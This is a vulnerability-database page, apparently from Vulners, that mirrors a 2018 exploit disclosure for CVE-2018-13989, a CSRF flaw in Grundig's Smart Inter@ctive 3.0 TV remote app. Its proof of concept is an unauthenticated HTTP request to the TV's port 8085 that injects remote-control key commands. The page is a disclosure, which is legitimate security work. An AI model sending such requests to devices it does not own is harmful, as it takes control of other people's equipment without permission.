Lucene search
K

Grundig Smart [email protected] 3.0 - Cross-Site Request Forgery Vulnerability

🗓️ 13 Jul 2018 00:00:00Reported by t4rkd3vilzType 
zdt
 zdt
🔗 0day.today👁 49 Views

Grundig Smart [email protected] 3.0 - Cross-Site Request Forgery Vulnerability. Remote control app allows unauthorized commands

Related
Code
ReporterTitlePublishedViews
Family
CNVD
Grundig Smart Inter@ctive TV Cross-Site Request Forgery Vulnerability
13 Jul 201800:00
cnvd
CVE
CVE-2018-13989
11 Jul 201816:00
cve
Cvelist
CVE-2018-13989
11 Jul 201816:00
cvelist
Exploit DB
Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
13 Jul 201800:00
exploitdb
EUVD
EUVD-2018-5921
7 Oct 202500:30
euvd
exploitpack
Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
13 Jul 201800:00
exploitpack
NVD
CVE-2018-13989
11 Jul 201816:29
nvd
OSV
CVE-2018-13989
11 Jul 201816:29
osv
Prion
Cross site request forgery (csrf)
11 Jul 201816:29
prion
# Exploit Title: Grundig Smart [email protected] 3.0 - Cross-Site Request Forgery
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik
# Version: Before > Smart [email protected] 3.0
# Tested on: Kali Linux
# CVE : CVE-2018-13989
 
# I'm trying my TV.I saw a Grundig remote control application on
# Google Play. Computer I downloaded and decompiled APK. 
# And I began to examine individual classes. I noticed in a class
# that a request was sent during operations on the command line.
# I downloaded the phone packet viewer and opened the control application and
# made some operations. And I saw that there was such a request;
 
# PoC
 
request ->
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
Host: 192.168.1.106:8085
Connection : Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
 
 
response ->
HTTP/1.1 200 OK
Content-Type : text/plain
 
# Set rc key is handled for key id : -2544 key symbol : -4081
# The only requirement for the connection between the TV and the application
# was to have the same IP address. After I made the IP address on the TV 
# and the phone and the IP address on the computer the same: 
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)

#  0day.today [2018-07-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation